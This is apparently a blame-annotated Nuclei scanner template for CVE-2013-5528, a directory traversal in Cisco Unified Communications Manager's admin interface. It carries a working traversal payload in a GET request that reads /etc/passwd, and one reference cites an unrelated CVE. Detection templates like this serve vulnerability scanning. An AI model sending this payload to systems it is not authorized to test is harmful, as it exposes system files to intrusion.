2021-07-22 23:12:07 +00:00
id : CVE-2013-5528
info :
name : Cisco Unified Communications Manager 7/8/9 - Directory Traversal
author : daffainfo
2023-07-11 19:49:27 +00:00
severity : medium
2022-02-25 14:32:23 +00:00
description : A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
2023-09-06 13:22:34 +00:00
remediation : |
Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.
2022-02-25 14:32:23 +00:00
reference :
- https://www.exploit-db.com/exploits/40887
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
2022-05-17 09:18:12 +00:00
- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528
2022-02-25 14:32:23 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
2023-04-18 02:40:53 +00:00
cvss-score : 4
2022-02-25 14:32:23 +00:00
cve-id : CVE-2013-5528
2022-09-06 01:33:31 +00:00
cwe-id : CWE-22
2023-10-14 11:27:55 +00:00
epss-score : 0.00565
2023-10-25 17:36:19 +00:00
epss-percentile : 0.75217
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cisco
product : unified_communications_manager
tags : cve,cve2013,lfi,cisco,edb
2021-07-22 23:12:07 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-22 23:12:07 +00:00
- method : GET
path :
- "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-22 23:12:07 +00:00
- type : status
status :
- 200
2023-10-26 12:01:43 +00:00
# digest: 4b0a00483046022100ac1a449c81a019bac93f8960865ab43df014d4d3b9a7c4e6f41060b61679f1780221008fd6c12c8900c88542edd0c9483139aea53553898ce5b8ad3c28db940f4c83d1:922c64590222798bb761d5b6d8e72950